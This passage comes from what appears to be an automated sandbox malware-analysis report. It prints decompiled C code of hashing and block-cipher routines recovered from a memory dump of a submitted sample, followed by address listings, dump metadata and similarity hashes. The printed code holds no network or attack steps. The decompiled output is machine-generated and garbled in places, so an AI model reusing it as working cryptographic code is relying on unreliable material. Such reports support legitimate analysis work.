					_t330 = _t1346 + 0x24; // 0xe850ffff
					_t1347 =  *_t330;
					_t1458 = _a4;
					 *(_t1458 + 0x20) = _t1456 >> 0x00000012 | _t1393 << 0x0000000e;
					 *(_t1458 + 0x24) = (_t1456 << 0x00000020 | _t1393) << 0xe;
					_t338 = _t1458 + 0x78; // 0x9bfb00d8
					_t1395 =  *_t338;
					_t339 = _t1458 + 0x7c; // 0x105e8b00
					_t1459 =  *_t339;
					_t1349 = _a4;
					 *(_t1349 + 0x78) = _t1347 >> 0x00000005 | _t1003 << 0x0000001b;
					 *(_t1349 + 0x7c) = (_t1347 << 0x00000020 | _t1003) << 0x1b;
					_t347 = _t1349 + 0xb8; // 0x333c5633
					_t1005 =  *_t347;
					_t348 = _t1349 + 0xbc; // 0x96336456
					_t1350 =  *_t348;
					_t1461 = _a4;
					 *(_t1461 + 0xbc) = _t1395 << 0x00000009 | _t1459 >> 0x00000017;
					 *(_t1461 + 0xb8) = (_t1459 << 0x00000020 | _t1395) >> 0x17;
					_t356 = _t1461 + 0x98; // 0x46335046
					_t1397 =  *_t356;
					_t357 = _t1461 + 0x9c; // 0xa0863378
					_t1462 =  *_t357;
					_t1352 = _a4;
					 *(_t1352 + 0x9c) = _t1005 << 0x00000018 | _t1350 >> 0x00000008;
					 *(_t1352 + 0x98) = (_t1350 << 0x00000020 | _t1005) >> 8;
					_t365 = _t1352 + 0x68; // 0x8b55c35d
					_t1007 =  *_t365;
					_t366 = _t1352 + 0x6c; // 0x28ec83ec
					_t1353 =  *_t366;
					_t1464 = _a4;
					 *(_t1464 + 0x68) = _t1462 >> 0x00000018 | _t1397 << 0x00000008;
					 *(_t1464 + 0x6c) = (_t1462 << 0x00000020 | _t1397) << 8;
					_t374 = _t1464 + 0x60; // 0x5fffc883
					_t1399 =  *_t374;
					_t375 = _t1464 + 0x64; // 0xe58b5b5e
					_t1465 =  *_t375;
					_t1355 = _a4;
					 *(_t1355 + 0x60) = _t1353 >> 0x00000007 | _t1007 << 0x00000019;
					 *(_t1355 + 0x64) = (_t1353 << 0x00000020 | _t1007) << 0x19;
					_t383 = _t1355 + 0x10; // 0xff348d8d
					_t1009 =  *_t383;
					_t384 = _t1355 + 0x14; // 0x5051ffff
					_t1356 =  *_t384;
					_t1467 = _a4;
					 *(_t1467 + 0x14) = _t1399 << 0x0000000b | _t1465 >> 0x00000015;
					 *(_t1467 + 0x10) = (_t1465 << 0x00000020 | _t1399) >> 0x15;
					_t392 = _t1467 + 0xa0; // 0x8b000000
					_t1401 =  *_t392;
					_t393 = _t1467 + 0xa4; // 0x4e33044e
					_t1468 =  *_t393;
					_t1358 = _a4;
					 *(_t1358 + 0xa0) = (_t1356 << 0x00000020 | _t1009) >> 2;
					 *(_t1358 + 0xa4) = _t1009 << 0x0000001e | _t1356 >> 0x00000002;
					_t401 = _t1358 + 0x70; // 0x758b5653
					_t1011 =  *_t401;
					_t402 = _t1358 + 0x74; // 0x45c75708
					_t1359 =  *_t402;
					_t1403 = _a4;
					 *(_t1403 + 0x70) = _t1468 >> 0x0000000e | _t1401 << 0x00000012;
					 *(_t1403 + 0x74) = (_t1468 << 0x00000020 | _t1401) << 0x12;
					_t410 = _t1403 + 0xb0; // 0xa48e
					_t411 = _t1403 + 0xb4; // 0x14568b00
					_t1470 =  *_t411;
					_v40 =  *_t410;
					 *(_t1403 + 0xb0) = (_t1359 << 0x00000020 | _t1011) >> 0x19;
					 *(_t1403 + 0xb4) = _t1011 << 0x00000007 | _t1359 >> 0x00000019;
					_t419 = _t1403 + 0x48; // 0xc483ffff
					_t1013 =  *_t419;
					_t420 = _t1403 + 0x4c; // 0x8dc0320c
					_t1404 =  *_t420;
					_t1361 = _v40;
					_t1363 = _a4;
					 *(_t1363 + 0x4c) = _t1361 << 0x0000001d | _t1470 >> 0x00000003;
					 *(_t1363 + 0x48) = (_t1470 << 0x00000020 | _t1361) >> 3;
					_t429 = _t1363 + 0x30; // 0x89fe2bc6
					_t1472 =  *_t429;
					_t430 = _t1363 + 0x34; // 0xceeb0845
					_t1364 =  *_t430;
					_t1406 = _a4;
					 *(_t1406 + 0x30) = _t1404 >> 0x0000000c | _t1013 << 0x00000014;
					 *(_t1406 + 0x34) = (_t1404 << 0x00000020 | _t1013) << 0x14;
					 *(_t1406 + 8) = (_t1364 << 0x00000020 | _t1472) >> 0x14;
					 *(_t1406 + 0xc) = _t1472 << 0x0000000c | _t1364 >> 0x00000014;
					_t444 = _t1406 + 8; // 0x852d72fe
					_t1189 =  *_t444;
					_t445 = _t1406 + 0x18; // 0xff9eeee8
					_t446 = _t1406 + 0x10; // 0xff348d8d
					_t1474 =  *_t446;
					_t447 = _t1406 + 0x14; // 0x5051ffff
					_t1366 =  *_t447;
					_v36 =  *_t1406;
					_t449 = _t1406 + 4; // 0x3b590845
					_v32 =  *_t449;
					_t451 = _t1406 + 0xc; // 0x561174f6
					_t452 = _t1406 + 0x1c; // 0xcc483ff
					_t1407 =  *_t452;
					_v28 =  *_t451;
					_t836 = _a4;
					_v16 = _t1189;
					_v40 =  *_t445;
					_t458 = _t836 + 0x20; // 0xff34858d
					_t1016 = _a4;
					_v24 =  *_t458;
					_t462 =  &(_a4[9]); // 0xe850ffff
					_v20 =  *_t462;
					 *_t1016 =  !_t1189 & _t1474 ^ _v36;
					_t1016[1] =  !_v28 & _t1366 ^ _v32;
					_t1016[2] =  !_t1474 & _v40 ^ _v16;
					_t1016[3] =  !_t1366 & _t1407 ^ _v28;
					_t1367 = _t1016;
					_t1367[5] =  !_t1407 & _v20 ^ _t1366;
					_t1367[4] =  !_v40 & _v24 ^ _t1474;
					_t1408 = _t1367;
					_t1408[7] =  !_v20 & _v32 ^ _t1407;
					_t1408[6] =  !_v24 & _v36 ^ _v40;
					_t1408[9] =  !_v32 & _v28 ^ _v20;
					_t1408[8] =  !_v36 & _v16 ^ _v24;
					_t492 =  &(_t1408[0xa]); // 0x3e
					_t493 =  &(_t1408[0xc]); // 0x89fe2bc6
					_t1211 =  *_t493;
					_t494 =  &(_t1408[0x10]); // 0x52ffffff
					_t495 =  &(_t1408[0xe]); // 0x1174ff85
					_t1475 =  *_t495;
					_t496 =  &(_t1408[0xf]); // 0x34958d57
					_t1368 =  *_t496;
					_v36 =  *_t492;
					_t498 =  &(_t1408[0xb]); // 0x308458b
					_v32 =  *_t498;
					_t500 =  &(_t1408[0xd]); // 0xceeb0845
					_t501 =  &(_t1408[0x11]); // 0x9ec1e850
					_t1409 =  *_t501;
					_v28 =  *_t500;
					_t863 = _a4;
					_v16 = _t1211;
					_v40 =  *_t494;
					_t507 = _t863 + 0x48; // 0xc483ffff
					_t1018 = _a4;
					_v24 =  *_t507;
					_t511 =  &(_a4[0x13]); // 0x8dc0320c
					_v20 =  *_t511;
					 *(_t1018 + 0x28) =  !_t1211 & _t1475 ^ _v36;
					 *(_t1018 + 0x2c) =  !_v28 & _t1368 ^ _v32;
					 *(_t1018 + 0x30) =  !_t1475 & _v40 ^ _v16;
					 *(_t1018 + 0x34) =  !_t1368 & _t1409 ^ _v28;
					_t1369 = _t1018;
					 *(_t1369 + 0x3c) =  !_t1409 & _v20 ^ _t1368;
					 *(_t1369 + 0x38) =  !_v40 & _v24 ^ _t1475;
					_t1410 = _t1369;
					 *(_t1410 + 0x40) =  !_v24 & _v36 ^ _v40;
					 *(_t1410 + 0x44) =  !_v20 & _v32 ^ _t1409;
					 *(_t1410 + 0x48) =  !_v36 & _v16 ^ _v24;
					 *(_t1410 + 0x4c) =  !_v32 & _v28 ^ _v20;
					_t542 = _t1410 + 0x50; // 0xffff34bd
					_t543 = _t1410 + 0x58; // 0xaaf30000
					_t1233 =  *_t543;
					_t544 = _t1410 + 0x68; // 0x8b55c35d
					_t545 = _t1410 + 0x60; // 0x5fffc883
					_t1476 =  *_t545;
					_t546 = _t1410 + 0x64; // 0xe58b5b5e
					_t1370 =  *_t546;
					_v36 =  *_t542;
					_t548 = _t1410 + 0x54; // 0xc8b9ff
					_v32 =  *_t548;
					_t550 = _t1410 + 0x5c; // 0x3ebc033
					_t551 = _t1410 + 0x6c; // 0x28ec83ec
					_t1411 =  *_t551;
					_v28 =  *_t550;
					_t890 = _a4;
					_v16 = _t1233;
					_v40 =  *_t544;
					_t557 = _t890 + 0x70; // 0x758b5653
					_t1020 = _a4;
					_v24 =  *_t557;
					_t561 =  &(_a4[0x1d]); // 0x45c75708
					 *(_t1020 + 0x50) =  !_t1233 & _t1476 ^ _v36;
					_v20 =  *_t561;
					 *(_t1020 + 0x54) =  !_v28 & _t1370 ^ _v32;
					 *(_t1020 + 0x58) =  !_t1476 & _v40 ^ _v16;
					 *(_t1020 + 0x5c) =  !_t1370 & _t1411 ^ _v28;
					_t1371 = _t1020;
					 *(_t1371 + 0x60) =  !_v40 & _v24 ^ _t1476;
					 *(_t1371 + 0x64) =  !_t1411 & _v20 ^ _t1370;
					_t1412 = _t1371;
					 *(_t1412 + 0x68) =  !_v24 & _v36 ^ _v40;
					 *(_t1412 + 0x6c) =  !_v20 & _v32 ^ _t1411;
					 *(_t1412 + 0x70) =  !_v36 & _v16 ^ _v24;
					 *(_t1412 + 0x74) =  !_v32 & _v28 ^ _v20;
					_t592 = _t1412 + 0x78; // 0x9bfb00d8
					_t593 = _t1412 + 0x80; // 0x33385e33
					_t1255 =  *_t593;
					_t594 = _t1412 + 0x90; // 0x68b0000
					_t595 = _t1412 + 0x88; // 0x88
					_t1477 =  *_t595;
					_t596 = _t1412 + 0x8c; // 0xb09e33
					_t1372 =  *_t596;
					_v36 =  *_t592;
					_t598 = _t1412 + 0x7c; // 0x105e8b00
					_v32 =  *_t598;
					_t600 = _t1412 + 0x84; // 0x9e33605e
					_t601 = _t1412 + 0x94; // 0x33284633
					_t1413 =  *_t601;
					_v28 =  *_t600;
					_t917 = _a4;
					_v16 = _t1255;
					_v40 =  *_t594;
					_t607 = _t917 + 0x98; // 0x46335046
					_t1022 = _a4;
					_v24 =  *_t607;
					_t611 =  &(_a4[0x27]); // 0xa0863378
					 *(_t1022 + 0x78) =  !_t1255 & _t1477 ^ _v36;
					_v20 =  *_t611;
					 *(_t1022 + 0x7c) =  !_v28 & _t1372 ^ _v32;
					 *(_t1022 + 0x80) =  !_t1477 & _v40 ^ _v16;
					 *(_t1022 + 0x84) =  !_t1372 & _t1413 ^ _v28;
					_t1373 = _t1022;
					 *(_t1373 + 0x88) =  !_v40 & _v24 ^ _t1477;
					 *(_t1373 + 0x8c) =  !_t1413 & _v20 ^ _t1372;
					_t1414 = _t1373;
					 *(_t1414 + 0x90) =  !_v24 & _v36 ^ _v40;
					 *(_t1414 + 0x94) =  !_v20 & _v32 ^ _t1413;
					 *(_t1414 + 0x98) =  !_v36 & _v16 ^ _v24;
					 *(_t1414 + 0x9c) =  !_v32 & _v28 ^ _v20;
					_t642 = _t1414 + 0xa0; // 0x8b000000
					_t643 = _t1414 + 0xa8; // 0x544e332c
					_t1277 =  *_t643;
					_t644 = _t1414 + 0xb0; // 0xa48e
					_t1478 =  *_t644;
					_t645 = _t1414 + 0xb8; // 0x333c5633
					_v36 =  *_t642;
					_t647 = _t1414 + 0xa4; // 0x4e33044e
					_t648 = _t1414 + 0xb4; // 0x14568b00
					_t1374 =  *_t648;
					_v32 =  *_t647;
					_t650 = _t1414 + 0xac; // 0x337c4e33
					_t651 = _t1414 + 0xbc; // 0x96336456
					_t1415 =  *_t651;
					_v28 =  *_t650;
					_t944 = _a4;
					_v16 = _t1277;
					_v40 =  *_t645;
					_t657 = _t944 + 0xc0; // 0x8c
					_t1024 = _a4;
					_v24 =  *_t657;
					_t661 =  &(_a4[0x31]); // 0xb49633
					_t1024[0x28] =  !_t1277 & _t1478 ^ _v36;
					_v20 =  *_t661;
					_t1024[0x29] =  !_v28 & _t1374 ^ _v32;
					_t1024[0x2a] =  !_t1478 & _v40 ^ _v16;
					_t1024[0x2b] =  !_t1374 & _t1415 ^ _v28;
					_t1375 = _t1024;
					_t1416 = _t1375;
					_t1375[0x2c] =  !_v40 & _v24 ^ _t1478;
					_t1375[0x2d] =  !_t1415 & _v20 ^ _t1374;
					_t1024[0x2e] =  !_v24 & _v36 ^ _v40;
					_t1024[0x2f] =  !_v20 & _v32 ^ _t1415;
					_t1416[0x30] =  !_v36 & _v16 ^ _v24;
					_t1416[0x31] =  !_v32 & _v28 ^ _v20;
					_t1299 = _v44;
					 *_t1416 =  *_t1416 ^  *_t1299;
					_t693 =  &(_t1299[1]); // 0x0
					_t969 =  *_t693;
					_t1300 =  &(_t1299[2]);
					_t1416[1] = _t1416[1] ^ _t969;
					_v44 = _t1300;
				} while (_t1300 < 0x9bfbc0);
				return _t969;
			}



























































































































































            0x009bab15
            0x009bab19
            0x009bab20
            0x009bab20
            0x009bab23
            0x009bab26
            0x009bab29
            0x009bab2f
            0x009bab37
            0x009bab3a
            0x009bab3d
            0x009bab40
            0x009bab46
            0x009bab49
            0x009bab4c
            0x009bab4f
            0x009bab52
            0x009bab58
            0x009bab5b
            0x009bab5e
            0x009bab61
            0x009bab67
            0x009bab6d
            0x009bab70
            0x009bab73
            0x009bab76
            0x009bab7c
            0x009bab7c
            0x009bab82
            0x009bab85
            0x009bab88
            0x009bab8b
            0x009bab8e
            0x009bab94
            0x009bab9a
            0x009bab9d
            0x009baba0
            0x009baba3
            0x009baba6
            0x009babac
            0x009babac
            0x009babb2
            0x009babb5
            0x009babb8
            0x009babbb
            0x009babbe
            0x009babc4
            0x009babc4
            0x009babca
            0x009babcd
            0x009babd0
            0x009babd3
            0x009babd6
            0x009babdc
            0x009babe2
            0x009babe5
            0x009babe8
            0x009babeb
            0x009babee
            0x009babf4
            0x009babfc
            0x009babff
            0x009bac0b
            0x009bac0e
            0x009bac10
            0x009bac18
            0x009bac1b
            0x009bac23
            0x009bac2b
            0x009bac2f
            0x009bac3b
            0x009bac40
            0x009bac47
            0x009bac4c
            0x009bac54
            0x009bac59
            0x009bac60
            0x009bac65
            0x009bac6d
            0x009bac70
            0x009bac72
            0x009bac75
            0x009bac7b
            0x009bac86
            0x009bac8c
            0x009bac94
            0x009bac99
            0x009baca3
            0x009baca7
            0x009bacad
            0x009bacb2
            0x009bacbb
            0x009bacc0
            0x009bacc7
            0x009baccc
            0x009bacd5
            0x009bacda
            0x009bace4
            0x009bacec
            0x009bacf6
            0x009bacfc
            0x009bad07
            0x009bad0d
            0x009bad13
            0x009bad19
            0x009bad1e
            0x009bad2c
            0x009bad2e
            0x009bad34
            0x009bad39
            0x009bad42
            0x009bad47
            0x009bad4e
            0x009bad53
            0x009bad5c
            0x009bad61
            0x009bad68
            0x009bad6d
            0x009bad76
            0x009bad7b
            0x009bad82
            0x009bad8a
            0x009bad96
            0x009bad9c
            0x009bad9e
            0x009bada1
            0x009bada7
            0x009badad
            0x009badb9
            0x009badc1
            0x009badd2
            0x009badd4
            0x009badd7
            0x009badd9
            0x009bade5
            0x009badea
            0x009badf1
            0x009badf9
            0x009badfc
            0x009bae03
            0x009bae0a
            0x009bae0f
            0x009bae17
            0x009bae1c
            0x009bae23
            0x009bae2b
            0x009bae36
            0x009bae3c
            0x009bae3e
            0x009bae44
            0x009bae4a
            0x009bae55
            0x009bae5b
            0x009bae5d
            0x009bae65
            0x009bae6a
            0x009bae74
            0x009bae78
            0x009bae7c
            0x009bae81
            0x009bae8a
            0x009bae8f
            0x009bae92
            0x009bae9c
            0x009baea3
            0x009baeaa
            0x009baeaf
            0x009baeb7
            0x009baebc
            0x009baec3
            0x009baece
            0x009baed4
            0x009baedc
            0x009baede
            0x009baee4
            0x009baeea
            0x009baef5
            0x009baefb
            0x009baf01
            0x009baf01
            0x009baf04
            0x009baf04
            0x009baf07
            0x009baf07
            0x009baf0a
            0x009baf0a
            0x009baf1e
            0x009baf21
            0x009baf26
            0x009baf29
            0x009baf2c
            0x009baf2c
            0x009baf36
            0x009baf40
            0x009baf45
            0x009baf4a
            0x009baf4a
            0x009baf4f
            0x009baf4f
            0x009baf52
            0x009baf61
            0x009baf66
            0x009baf6b
            0x009baf70
            0x009baf70
            0x009baf76
            0x009baf76
            0x009baf88
            0x009baf8d
            0x009baf95
            0x009baf9d
            0x009baf9d
            0x009bafa3
            0x009bafa3
            0x009bafb5
            0x009bafba
            0x009bafc2
            0x009bafca
            0x009bafca
            0x009bafcd
            0x009bafcd
            0x009bafdc
            0x009bafe1
            0x009bafe6
            0x009bafeb
            0x009bafeb
            0x009bafee
            0x009bafee
            0x009bafff
            0x009bb002
            0x009bb005
            0x009bb008
            0x009bb008
            0x009bb010
            0x009bb010
            0x009bb026
            0x009bb029
            0x009bb031
            0x009bb039
            0x009bb039
            0x009bb03c
            0x009bb03c
            0x009bb04d
            0x009bb050
            0x009bb055
            0x009bb05a
            0x009bb05a
            0x009bb060
            0x009bb060
            0x009bb074
            0x009bb077
            0x009bb07f
            0x009bb087
            0x009bb087
            0x009bb08d
            0x009bb08d
            0x009bb09f
            0x009bb0a4
            0x009bb0ac
            0x009bb0b4
            0x009bb0b4
            0x009bb0b7
            0x009bb0b7
            0x009bb0c6
            0x009bb0cb
            0x009bb0d0
            0x009bb0d5
            0x009bb0d5
            0x009bb0d8
            0x009bb0d8
            0x009bb0e7
            0x009bb0ec
            0x009bb0f1
            0x009bb0f6
            0x009bb0f6
            0x009bb0fc
            0x009bb0fc
            0x009bb110
            0x009bb113
            0x009bb11b
            0x009bb123
            0x009bb123
            0x009bb129
            0x009bb129
            0x009bb13d
            0x009bb140
            0x009bb148
            0x009bb150
            0x009bb150
            0x009bb153
            0x009bb153
            0x009bb162
            0x009bb167
            0x009bb16c
            0x009bb171
            0x009bb171
            0x009bb174
            0x009bb174
            0x009bb183
            0x009bb188
            0x009bb18d
            0x009bb192
            0x009bb192
            0x009bb195
            0x009bb195
            0x009bb1a6
            0x009bb1a9
            0x009bb1ae
            0x009bb1b3
            0x009bb1b3
            0x009bb1b9
            0x009bb1b9
            0x009bb1cd
            0x009bb1d0
            0x009bb1d8
            0x009bb1e0
            0x009bb1e0
            0x009bb1e3
            0x009bb1e3
            0x009bb1f4
            0x009bb1f7
            0x009bb1fc
            0x009bb1ff
            0x009bb205
            0x009bb205
            0x009bb20b
            0x009bb21c
            0x009bb224
            0x009bb22c
            0x009bb22c
            0x009bb22f
            0x009bb22f
            0x009bb232
            0x009bb243
            0x009bb248
            0x009bb24d
            0x009bb252
            0x009bb252
            0x009bb255
            0x009bb255
            0x009bb264
            0x009bb269
            0x009bb26e
            0x009bb27f
            0x009bb284
            0x009bb289
            0x009bb289
            0x009bb28c
            0x009bb28f
            0x009bb28f
            0x009bb292
            0x009bb292
            0x009bb295
            0x009bb298
            0x009bb29b
            0x009bb29e
            0x009bb2a1
            0x009bb2a1
            0x009bb2a4
            0x009bb2a7
            0x009bb2aa
            0x009bb2b1
            0x009bb2b7
            0x009bb2ba
            0x009bb2bd
            0x009bb2c3
            0x009bb2c6
            0x009bb2cc
            0x009bb2d7
            0x009bb2ed
            0x009bb2f2
            0x009bb308
            0x009bb30a
            0x009bb30d
            0x009bb325
            0x009bb327
            0x009bb32a
            0x009bb343
            0x009bb346
            0x009bb349
            0x009bb34c
            0x009bb34c
            0x009bb34f
            0x009bb352
            0x009bb352
            0x009bb355
            0x009bb355
            0x009bb358
            0x009bb35b
            0x009bb35e
            0x009bb361
            0x009bb364
            0x009bb364
            0x009bb367
            0x009bb36a
            0x009bb36d
            0x009bb374
            0x009bb37a
            0x009bb37d
            0x009bb380
            0x009bb386
            0x009bb389
            0x009bb38f
            0x009bb39b
            0x009bb3b1
            0x009bb3b6
            0x009bb3cc
            0x009bb3ce
            0x009bb3d1
            0x009bb3e9
            0x009bb3eb
            0x009bb3ee
            0x009bb407
            0x009bb40a
            0x009bb40d
            0x009bb410
            0x009bb410
            0x009bb413
            0x009bb416
            0x009bb416
            0x009bb419
            0x009bb419
            0x009bb41c
            0x009bb41f
            0x009bb422
            0x009bb425
            0x009bb428
            0x009bb428
            0x009bb42b
            0x009bb42e
            0x009bb431
            0x009bb438
            0x009bb43e
            0x009bb441
            0x009bb444
            0x009bb44a
            0x009bb44d
            0x009bb452
            0x009bb45f
            0x009bb475
            0x009bb47a
            0x009bb48e
            0x009bb492
            0x009bb498
            0x009bb4ad
            0x009bb4af
            0x009bb4b2
            0x009bb4cb
            0x009bb4ce
            0x009bb4d1
            0x009bb4d4
            0x009bb4d4
            0x009bb4da
            0x009bb4e0
            0x009bb4e0
            0x009bb4e6
            0x009bb4e6
            0x009bb4ec
            0x009bb4ef
            0x009bb4f2
            0x009bb4f5
            0x009bb4fb
            0x009bb4fb
            0x009bb501
            0x009bb504
            0x009bb507
            0x009bb50e
            0x009bb514
            0x009bb51a
            0x009bb51d
            0x009bb523
            0x009bb529
            0x009bb52e
            0x009bb53b
            0x009bb551
            0x009bb559
            0x009bb572
            0x009bb574
            0x009bb57d
            0x009bb595
            0x009bb597
            0x009bb5a0
            0x009bb5b1
            0x009bb5bf
            0x009bb5c5
            0x009bb5cb
            0x009bb5cb
            0x009bb5d1
            0x009bb5d1
            0x009bb5d7
            0x009bb5dd
            0x009bb5e0
            0x009bb5e6
            0x009bb5e6
            0x009bb5ec
            0x009bb5ef
            0x009bb5f5
            0x009bb5f5
            0x009bb5fb
            0x009bb5fe
            0x009bb601
            0x009bb608
            0x009bb60e
            0x009bb614
            0x009bb617
            0x009bb61d
            0x009bb623
            0x009bb62b
            0x009bb638
            0x009bb651
            0x009bb659
            0x009bb672
            0x009bb674
            0x009bb676
            0x009bb67f
            0x009bb697
            0x009bb6a0
            0x009bb6b9
            0x009bb6bf
            0x009bb6c5
            0x009bb6ca
            0x009bb6cc
            0x009bb6cc
            0x009bb6cf
            0x009bb6d2
            0x009bb6d5
            0x009bb6d8
            0x009bb6ea

            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 59295902020624880401a34eaade51f175c8b88d2f47f36299341a4cb4b04d2d
            • Instruction ID: 15d87a84e38cdb6c131828778716413d41030e0beb1e7e247a04ddac44c63954
            • Opcode Fuzzy Hash: 59295902020624880401a34eaade51f175c8b88d2f47f36299341a4cb4b04d2d
            • Instruction Fuzzy Hash: 39A2F475A106198FDB48CF69C491AAAF7F2BF8C300F55856ED85AEB741CB34A841CF90
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B85D5, Relevance: .4, Instructions: 360COMMONCrypto
            Download Yara Rule
            C-Code - Quality: 75%
            			E009B85D5(void* __eflags, unsigned int _a4, signed int _a8, signed int _a12, signed int* _a16) {
				unsigned int _v8;
				unsigned int _v12;
				unsigned int _v16;
				unsigned int _v20;
				signed int _t383;
				signed char _t388;
				signed char _t393;
				unsigned int _t394;
				signed int* _t396;
				unsigned int _t413;
				signed int _t420;
				unsigned int _t434;
				unsigned int _t453;
				unsigned int _t499;
				unsigned int _t501;
				unsigned int _t507;
				signed int* _t509;
				signed int* _t511;
				signed int* _t512;
				signed int _t516;
				signed int _t517;
				signed int _t519;
				void* _t521;

				_t521 = __eflags;
				_t396 = _a12;
				asm("rol eax, 0x8");
				asm("ror edx, 0x8");
				_t511 = _a4;
				_a4 = ( *_t396 & 0xff00ff00 |  *_t396 & 0x00ff00ff) ^  *_t511;
				asm("rol eax, 0x8");
				asm("ror edx, 0x8");
				_t6 =  &(_t511[1]); // 0x330475c0
				asm("rol eax, 0x8");
				asm("ror ebx, 0x8");
				_v12 = (_t396[1] & 0xff00ff00 | _t396[1] & 0x00ff00ff) ^  *_t6;
				_t9 =  &(_t511[2]); // 0x560aebc0
				_t388 = (_t396[2] & 0xff00ff00 | _t396[2] & 0x00ff00ff) ^  *_t9;
				asm("rol eax, 0x8");
				asm("ror edx, 0x8");
				_t11 =  &(_t511[3]); // 0xffe85ce8
				_t499 = (_t396[3] & 0xff00ff00 | _t396[3] & 0x00ff00ff) ^  *_t11;
				_t21 =  &(_t511[4]); // 0x59c033ff
				_v16 =  *(0x9bdad8 + (_t388 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x9bd6d8 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x9bd2d8 + (_a4 >> 0x18) * 4) ^  *(0x9bded8 + (_t499 & 0x000000ff) * 4) ^  *_t21;
				_t33 =  &(_t511[5]); // 0x8b5e5b40
				_v8 =  *(0x9bdad8 + (_t499 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x9bd6d8 + (_t388 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x9bd2d8 + (_v12 >> 0x18) * 4) ^  *(0x9bded8 + (_a4 & 0x000000ff) * 4) ^  *_t33;
				_a12 =  *(0x9bd6d8 + (_t499 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x9bdad8 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x9bd2d8 + (_t388 >> 0x18) * 4);
				_t413 = _v12;
				_t516 = _a12 ^  *(0x9bded8 + (_t413 & 0x000000ff) * 4);
				_a12 = _t516;
				_t48 =  &(_t511[6]); // 0x55c35de5
				_a12 = _t516 ^  *_t48;
				_t60 =  &(_t511[7]); // 0xec83ec8b
				_t420 =  *(0x9bdad8 + (_t413 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x9bd6d8 + (_a4 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x9bd2d8 + (_t499 >> 0x18) * 4) ^  *(0x9bded8 + (_t388 & 0x000000ff) * 4) ^  *_t60;
				_t512 =  &(_t511[8]);
				_a8 = (_a8 >> 1) - 1;
				while(1) {
					_a4 = _t420;
					if(_t521 == 0) {
						break;
					}
					_t517 = _a12;
					_t501 = _v16;
					_v12 =  *(0x9bdad8 + (_t517 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x9bd6d8 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x9bd2d8 + (_t501 >> 0x18) * 4) ^  *(0x9bded8 + (_a4 & 0x000000ff) * 4) ^  *_t512;
					_t85 =  &(_t512[1]); // 0x5350d045
					_v20 =  *(0x9bdad8 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x9bd6d8 + (_t517 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x9bd2d8 + (_v8 >> 0x18) * 4) ^  *(0x9bded8 + (_t501 & 0x000000ff) * 4) ^  *_t85;
					_t434 = _v8;
					_t97 =  &(_t512[2]); // 0x1692e8
					_t393 =  *(0x9bd6d8 + (_a4 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x9bdad8 + (_t501 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x9bd2d8 + (_t517 >> 0x18) * 4) ^  *(0x9bded8 + (_t434 & 0x000000ff) * 4) ^  *_t97;
					_t107 =  &(_t512[3]); // 0x14c48300
					_t507 =  *(0x9bdad8 + (_t434 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x9bd6d8 + (_t501 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x9bd2d8 + (_a4 >> 0x18) * 4) ^  *(0x9bded8 + (_t517 & 0x000000ff) * 4) ^  *_t107;
					_t118 =  &(_t512[4]); // 0x1374c085
					_v16 =  *(0x9bdad8 + (_t393 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x9bd6d8 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x9bd2d8 + (_v12 >> 0x18) * 4) ^  *(0x9bded8 + (_t507 & 0x000000ff) * 4) ^  *_t118;
					_t130 =  &(_t512[5]); // 0xff0c75ff
					_v8 =  *(0x9bdad8 + (_t507 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x9bd6d8 + (_t393 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x9bd2d8 + (_v20 >> 0x18) * 4) ^  *(0x9bded8 + (_v12 & 0x000000ff) * 4) ^  *_t130;
					_a12 =  *(0x9bd6d8 + (_t507 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x9bdad8 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x9bd2d8 + (_t393 >> 0x18) * 4);
					_t453 = _v20;
					_t519 = _a12 ^  *(0x9bded8 + (_t453 & 0x000000ff) * 4);
					_a12 = _t519;
					_t145 =  &(_t512[6]); // 0xe8530875
					_a12 = _t519 ^  *_t145;
					_t156 =  &(_t512[7]); // 0x1637
					_t420 =  *(0x9bdad8 + (_t453 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x9bd6d8 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x9bd2d8 + (_t507 >> 0x18) * 4) ^  *(0x9bded8 + (_t393 & 0x000000ff) * 4) ^  *_t156;
					_t512 =  &(_t512[8]);
					_t157 =  &_a8;
					 *_t157 = _a8 - 1;
					__eflags =  *_t157;
				}
				_t394 = _v16;
				_t509 = _a16;
				asm("rol ecx, 0x8");
				asm("ror eax, 0x8");
